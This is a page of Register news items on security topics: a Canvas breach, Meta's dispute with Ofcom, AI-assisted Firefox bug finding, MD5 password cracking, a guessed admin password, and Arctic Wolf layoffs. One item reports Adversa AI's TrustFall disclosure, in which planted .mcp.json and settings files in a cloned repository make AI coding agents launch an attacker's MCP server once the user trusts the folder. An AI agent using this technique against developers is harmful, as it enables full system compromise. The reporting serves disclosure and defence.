Students around the world have an excuse to bunk off after hacking crew ShinyHunters did something nasty to educational SaaS Canvas. Canvas is widely used by schools and universities to communicate with students, publish and store course material, and collect assignments. An outfit called Instructure develops the software and an entry on its Status Page dated May 2 features Chief Information Security Officer Steve Proud stating the org "recently experienced a cybersecurity incident perpetrated by a criminal threat actor." "We are actively investigating this incident with the help of outside forensics experts. We are working quickly to understand the extent of the incident and actively taking steps to minimize its impact," he added. Numerous posts report that attempts to log into Canvas earlier this week failed, but did produce a notice from an entity claiming to be the notorious hacking crew ShinyHunters, who claimed the outage was only possible due to lax patching. The crew also claimed to have stolen data from institutions that use Canvas and threatened to leak it unless a "settlement" is reached by May 12. Canvas has thousands of customers, meaning any confirmed breach could have wide impact. As of Thursday evening US time, Canvas says its wares are now available "for most users" and won't offer further comment. A student of The Register's acquaintance – OK, one of my kids – shared an email advising that his uni has prevented access to Canvas while it tries to understand the situation and the risk of data leakage. We've seen multiple universities posting notices about the incident that say more or less the same thing. Most also warn students of heightened phishing risk and urge caution. Several also advise that as they require students to lodge assignments in Canvas, students can assume they have an extension on deadlines. Your correspondent's offspring does not mind this one little bit. This is an evolving story. The Register will update it as more information becomes available. ®
Categories: News

Meta fights Ofcom over how many billions count as billions

The Register - Fri, 08/05/2026 - 11:39
Meta appears to have decided Britain's Online Safety Act would be much easier to swallow if Ofcom stopped counting all the money the social media giant makes everywhere else. The Facebook and Instagram owner has launched a legal challenge against the UK comms regulator, arguing that the way Ofcom calculates fees and potential penalties under the Online Safety Act is fundamentally wrong because it relies on global turnover rather than UK-specific revenue. The law allows Ofcom to fine companies for up to 10 percent of their qualifying worldwide revenue, or £18 million, whichever is higher. For Meta, which brought in about $201 billion last year, that means the numbers stop sounding like regulatory penalties and start sounding like national infrastructure projects. Meta is now seeking a judicial review in the High Court over how Ofcom defines "qualifying worldwide revenue." The dispute boils down to three complaints. First, Meta argues that Ofcom should only consider UK revenue tied to regulated services, not the company’s global income. Second, it objects to rules that treat multiple services under the same corporate umbrella as jointly liable, potentially exposing the wider organization to larger penalties. Third, it is challenging how Ofcom aggregates revenue across services rather than assessing them individually. An Ofcom spokesperson told The Register: "Meta have initiated a judicial review in relation to online safety fees and penalties. Under the Online Safety Act, these are to be set with reference to a provider's 'Qualifying Worldwide Revenue', which we have defined based on a plain reading of the law. "Disappointingly, Meta are objecting to the payment of fees, and any penalties that could be levied on companies in future, that are calculated on this basis. We will robustly defend our reasoning and decisions." A Meta spokesperson told The Register: "We are committed to cooperating constructively with Ofcom as it enforces the Online Safety Act. However, we and others in the tech industry believe its decisions on the methodology to calculate fees and potential fines are disproportionate. We believe fees and penalties should be based on the services being regulated in the countries they're being regulated in. This would still allow Ofcom to impose the largest fines in UK corporate history." The case marks the latest flare-up between Silicon Valley and Britain over the Online Safety Act, which has already triggered complaints from US politicians, free speech campaigners, and tech firms unhappy about the scale of Ofcom’s new powers. The regulator has not been shy about flexing them either. It has already threatened action against Elon Musk's X over sexually explicit AI-generated images linked to Grok and, in March, issued its first fine under the regime against 4chan. Meta appears to have looked at where that enforcement road leads and decided now was the time to argue about the math. ®
Categories: News

Mozilla boasts Mythos boosted Firefox bug cull

The Register - Fri, 08/05/2026 - 00:32
Mozilla fixed 423 Firefox security bugs in April, a repair rate more than five times higher than the 76 fixes issued in March and almost 20 times higher than its 21.5 monthly average last year. The browser maker previously said Anthropic's ballyhooed Mythos Preview model found 271 of these in Firefox 150. Now, a trio of technical types has come forward to provide a bit more detail about what Mythos (and its less storied sibling Opus 4.6) actually found. But they also highlight something that may matter more than the model: the agentic harness – the middleware mediating between AI and the end user. Brian Grinstead, Firefox distinguished engineer, Christian Holler, Firefox tech lead, and Frederik Braun, head of the Firefox security team, observe that over the past few months, AI-generated security reports have gone from slop to rather more tasty. They attribute the transformation to better models and development of better ways of harnessing those models – steering them in a way that increases the ratio of signal to noise. But they also appear to be aware that there's some skepticism in the security community about Mythos. So they've decided to publicize selected wins in an effort to encourage others to jump aboard the AI bug remediation train. "Ordinarily we keep detailed bug reports private for several months after shipping fixes and issuing security advisories, largely as a precaution to protect any users who, for whatever reason, were slow to update to the latest version of Firefox," they said. "Given the extraordinary level of interest in this topic and the urgency of action needed throughout the software ecosystem, we’ve made the calculated decision to unhide a small sample of the reports behind the fixes we recently shipped." The post links to a dozen Firefox bugs with varying degrees of severity. The list includes, for example, a 20-year-old heap use-after-free bug (high severity) that a web page could trigger using the XSLTProcessor DOM API without any user interaction. Many of these bugs are sandbox escapes, they note, which are difficult to find using techniques like fuzzing. AI analysis, they say, helps provide broader security coverage. And they add that it has helped validate prior browser hardening work designed to prevent prototype pollution attacks – audit logs showed AI models making unsuccessful exploitation attempts using this technique. Following Anthropic's announcement of Project Glasswing – a program for companies to gain early access to Mythos because it's touted as too dangerous for public release – security experts expressed skepticism. For example, Davi Ottenheimer, president of security consultancy flyingpenguin, wrote in an April 13 blog post, "The supposedly huge Anthropic 'step change' appears to be little more than a rounding error. The threat narrative so far appears to be ALL marketing and no real results. The Glasswing consortium is regulatory capture dressed up poorly as restraint." He subsequently ran a test in which he strapped Anthropic's lesser models Sonnet 4.6 and Haiku 4.5 into a harness called Wirken with an auditing skill called Lyrik. The result was eight findings in two minutes at a cost of about $0.75, Ottenheimer claims, noting that two of the eight matched bugs Mythos had identified. Other security folk have also reported that bug hunting and exploit development can be quite productive with off-the-shelf models like Opus 4.6, which among other virtues costs about 5x less than Mythos. In an email to The Register, Ottenheimer said, "There's a fundamental philosophical failure in the Mozilla post. A reading and a measurement are not the same thing. I don't see a measurement, but they seem to want us to believe we're looking at one. "When they give us the 'behind the scenes math' it's circular, a trick. 'Mythos found 271 bugs' is what Mythos found, not what other tools could not find against the same code. Why leave it as an assumption if it can be proven?" Ottenheimer said Mozilla advocates that every project adopt a similar approach without proving the merits of that approach. "It's like saying if you don't drink Coca-Cola, you can't run a mile under six minutes, because that's what a guy sponsored by Coca-Cola just did," he said. "The bar moves on rhetoric, marketing, not proper evidence. That is the capture crew again." He notes that the merits of Mythos might be more convincing if Mozilla had reported they couldn't do this work without Mythos. And since they're not saying that, he suggests, it's worth asking why there's no transparent comparison of Mythos to other models. He points to Mozilla's admission that Opus 4.6 was already identifying "an impressive amount of previously unknown vulnerabilities." "Mozilla never quantifies what Opus 4.6 [did] before saying what Mythos added," he said. "So 271 attributed to Mythos doesn't fit the analysis. And there's a deeper reveal when they say 'we dramatically improved our techniques for harnessing these models.' The improvement may be entirely in the harness, not as much in the model. This maps to my own experience. A nail gun has advantages over the hammer, yet without being in the right hands the outputs are as bad or worse." ®
Categories: News

Anthropic response to 1-click pwn: Shouldn't have clicked 'ok'

The Register - Thu, 07/05/2026 - 21:03
How explicit does the maker of a footgun need to be about the product's potential to shoot you in the foot? That's essentially the question security firm Adversa AI is asking with the disclosure of a one-click remote code execution attack via an MCP server in Claude Code, Gemini CLI, Cursor CLI, and Copilot CLI. The TrustFall proof-of-concept attack demonstrates how a cloned code repository can include two JSON files (.mcp.json and .claude/settings.json) that open the door to an attacker-controlled Model Context Protocol (MCP) server. MCP servers make tools, configuration data, schemas, and documentation available in a standard format to AI models via JSON. The vulnerability arises from inconsistent restrictions governing the scope of settings: Anthropic blocks some dangerous settings at the project level (e.g. bypassPermissions) but not others (e.g. enableAllProjectMcpServers and enabledMcpjsonServers). The JSON files simply enable those settings. "The moment a developer presses Enter on Claude Code's generic 'Yes, I trust this folder' dialog, the server spawns as an unsandboxed Node.js process with the user's full privileges — no per-server consent, no tool call from Claude required," Adversa AI explains in its PoC repo. The likely result is a compromised system. The PoC demonstrated in this video. It worked on Claude Code CLI v2.1.114, as of May 2. Other agent CLIs are also said to be affected, but specific PoCs have not been published. "It's the third CVE in Claude Code in six months from the same root cause (project-scoped settings as injection vector)," Alex Polyakov, co-founder of Adversa AI, told The Register in an email. "Each gets patched in isolation but the underlying class hasn't been finally fixed. Most developers don't know these settings exist, let alone that a cloned repo can set them silently." Anthropic, according to the security biz, contends that the user's trust decision moves the issue outside its threat model. CVE-2025-59536 was considered a vulnerability because it triggered automatically when a user started up Claude Code in a malicious directory. TrustFall, however, is considered out of scope because the user has been presented with a dialog box and made a trust decision. Adversa argues that the decision is not being made with informed consent, citing a prior, more explicit warning notice that was removed in v2.1 of the Claude Code CLI. "The pre-v2.1 dialog explicitly warned that .mcp.json could execute code and offered three options including 'proceed with MCP servers disabled,'" writes Adversa's Sergey Malenkovich. "That informed-consent UX was removed. The current dialog defaults to 'Yes, I trust this folder' with no MCP-specific language, no enumeration of which executables will spawn, and no opt-out for MCP while keeping the rest of the trust grant." Then there's the zero-click variant to consider for CI/CD pipelines that implement Claude Code. When Claude Code is invoked in CI/CD, that happens via SDK rather than the interactive CLI. So there's no terminal prompt. Malenkovich argues that Anthropic should make three changes. First, block enableAllProjectMcpServers, enabledMcpjsonServers, and permissions.allow from any settings file inside a project. The idea is that a malicious server should not be able to approve its own servers. Second, implement a dedicated MCP consent dialog that defaults to "deny." And third, require interactive consent per server rather than for all servers. Anthropic did not respond to a request for comment. ®
Categories: News

60% of MD5 password hashes are crackable in under an hour

The Register - Thu, 07/05/2026 - 17:47
It’s World Password Day, and there’s really no better way to celebrate than with news that a majority of supposedly secure password hashes can be cracked with a single GPU in less than an hour, some in less than a minute. Using a dataset of more than 231 million unique passwords sourced from dark web leaks - including 38 million added since its previous study - and hashing them with MD5, researchers at security firm Kaspersky found that, using a single Nvidia RTX 5090 graphics card, 60 percent of passwords could be cracked in less than an hour, and a full 48 percent in under 60 seconds. Sure, that’s not exactly your run-of-the-mill desktop graphics processor given its price, but it highlights an important point: It takes surprisingly little to crack the average password hash. Aspiring cybercriminals don’t even really need their own 5090, Kaspersky notes, as they can easily rent one from a cloud provider and crack hashes for a few bucks. The bottom line is that passwords protected only by fast hashing algorithms such as MD5 are no longer safe if attackers obtain them in a data breach. “One hour is all an attacker needs to crack three out of every five passwords they’ve found in a leak,” Kaspersky noted. Much of the reason password hashes have become so easy to crack is password predictability. Per Kaspersky, its analysis of more than 200 million exposed passwords revealed common patterns that attackers can use to optimize cracking algorithms, significantly reducing the time needed to guess the character combinations that grant access to target accounts. In case you’re wondering whether there’s a trend to compare this to, Kaspersky ran a prior iteration of this study in 2024, and bad news: Passwords are actually a bit easier to crack in 2026 than they were a couple of years ago. Not by much, mind you - only a few percent - but it’s still a move in the wrong direction. “Attackers owe this boost in speed to graphics processors, which grow more powerful every year,” Kaspersky explained. “Unfortunately, passwords remain as weak as ever.” How about a World Let’s-Stop-Relying-On Passwords Day? News of the death of the password has, unfortunately, been greatly exaggerated in the past couple of decades, yet most of us still rely on them multiple times a day. It likely won’t surprise El Reg readers to learn that us vultures are inundated with pitches for events like World Password Day, and most of them received this year had the same takeaway: We really need to get a move on with ditching passwords, or, at the very least, rethinking our security paradigms. Chris Gunner, a CISO-for-hire at managed service provider giant Thrive, told us in emailed comments that there’s no reason to ditch passwords entirely, but they need to be just one part of a broader identity-based security strategy. “Even a strong password can be undermined if the wider identity and access environment is not properly managed,” Gunner said. Passwords should be paired with a second factor, preferably biometric, said Gunner, because it’s the most difficult for hackers to bypass. “MFA controls should then be joined by identity governance and endpoint protection so gaps between systems are reduced,” Gunner added, recommending that a broader zero trust model be established as well, restricting lateral movement possibilities via a compromised account. Senior IEEE member and University of Nottingham cybersecurity professor Steven Furnell said that World Password Day messaging shouldn’t stop at telling people to improve their personal security posture either. Passwords aren’t going anywhere for a long while, Furnell explained in an email, and inconsistent adoption of new security technologies will mean users will be left at risk as certain providers fail to adapt. “Many sites and services still don’t offer passkey support, so users will find themselves with a mixed login experience,” Furnell explained. “While some might argue that it’s the user’s responsibility to protect themselves properly, they need to know how to do it.” The professor noted that, in many cases, users aren’t told how to create a good modern password, and in other cases, sites simply don’t enforce adequate password requirements to make passwords secure, to the degree that they can be made so. “This World Password Day, the main message ought not to be to the users, who often have no choice but to use passwords anyway, but to the sites and providers that are requiring them to do so,” Furnell told us. You heard the man - time to upgrade that user security stack. No matter how safe you think those passwords might be, with their complex requirements and proper hashed storage, it probably won’t take too long for someone to break in, making it an organizational responsibility to ensure there’s yet another locked door behind the first one. ®
Categories: News

The network password was a key plot point in one of the most famous movies of all time

The Register - Thu, 07/05/2026 - 10:49
PWNED Welcome back to PWNED, the weekly column where we turn a white hot spotlight onto the cracks and crevices in company security and write about those who have let their guard down, often in the name of convenience, incompetence, or just plain laziness. Today’s tale of woe concerns the need to secure a network and the dangers of an insecure password. Our story comes courtesy of Roger Grimes, CISO advisor at security firm KnowBe4. He recounts a time when he had to get into a client’s network but didn’t have the credentials. Grimes was installing accounting software for a client and, as a result, needed to take the network down for a day. To make sure that he didn’t disturb any work, he decided to log into the system on a Saturday. Unfortunately, he was missing the admin password he needed to uninstall old software and add the new app. Since it was the weekend, no one was answering their work phones to give him the information he needed, and there was a good chance he would have to delay the upgrade until the following weekend. Grimes could have given up right there, but he had an idea. Why not try to figure out what the password was? The situation reminded him of a movie. “You know, the scene where the hacker is sitting at the terminal trying to log on, but the victim refuses to give up credentials. So the hacker starts typing random passwords out of thin air,” he said. “And wouldn’t you know it? They correctly guess the password at the last possible moment.” After trying numerous passwords, the advisor thought about a famous movie he had just watched: Citizen Kane. He decided to try “rosebud,” and voilà. (This vulture can identify with the Orson Welles focus, having just watched The Third Man this week.) It’s a good thing that it was Grimes, a legit contractor, guessing passwords instead of some miscreant. Picking a password from a movie plotline is a bad idea and, in this case, made even worse by the lack of numbers, capital letters, or symbols in the password. If you’re picking out a password, you might be better off generating a strong password that’s a string of random numbers and letters and then having it remembered by a password manager. Then, for the password manager itself, consider a passphrase that contains capital letters, symbols, and numbers such as “Shoe-Please6-Wrapped-Carbon-Wear” so you can try to remember it. You might also use a passphrase for your admin password – you can generate a random one using Keeper’s Passphrase Generator. Have a story about someone leaving a gaping hole in their network? Share it with us at pwned@sitpub.com. Anonymity available upon request. ®
Categories: News

Arctic Wolf kicks 250 employees out of the pack to save money for AI

The Register - Wed, 06/05/2026 - 19:20
Cybersecurity vendor Arctic Wolf has laid off 250 workers in a restructuring that it says is designed to position the company to invest more in AI through its superintelligence platform and agentic Security Operations Center (SOC), a company spokesperson told The Register. “We recently made an organizational restructuring to better align the company’s structure and investments with our long‑term strategy,” a spokesperson said. “While these decisions are difficult, they position Arctic Wolf to operate more efficiently, continue investing in our Superintelligence platform and Agentic SOC, and deliver strong value to customers. We remain confident in our direction and momentum.” The layoffs appear to represent less than 10 percent of the total workforce. Arctic Wolf is a privately held company and does not publish a current headcount, but in December 2024, the company said it employed more than 2,600 workers, according to a press release it issued at the time. According to the website PitchBook, Arctic Wolf has 3,323 employees. The job cuts appeared to fall across several categories including sales, product development, and marketing. Some had been with the company for four years or more in revenue-generating roles such as sales engineer. One senior systems engineer with experience in datacenter infrastructure and cyber threat detection said on LinkedIn he was let go after more than a year with the company. “Wow! I was not expecting to have such a swing in posts this week from super positive to negative. Today I was laid off by Arctic Wolf due to restructuring,” wrote one sales engineer the day after he wrote a post about the success they had experienced last year. Alongside its five global SOCs, Arctic Wolf has offices in Waterloo, Ontario; San Antonio, Texas; Eden Prairie, Minnesota; Bengaluru, India, and other locations worldwide. Arctic Wolf operates in crowded endpoint detection and response (EDR) and managed detection and response (MDR) markets alongside CrowdStrike, Rapid7, and SentinelOne. It also competes for channel partners and customers with the likes of Huntress and Blackpoint Cyber. The company has bet on its Aurora Superintelligence Platform that combines security data, a “Swarm of Experts” AI agents and humans in the loop to protect customers' systems. ®
Categories: News

Pages

Subscribe to Sec Tec Limited aggregator - News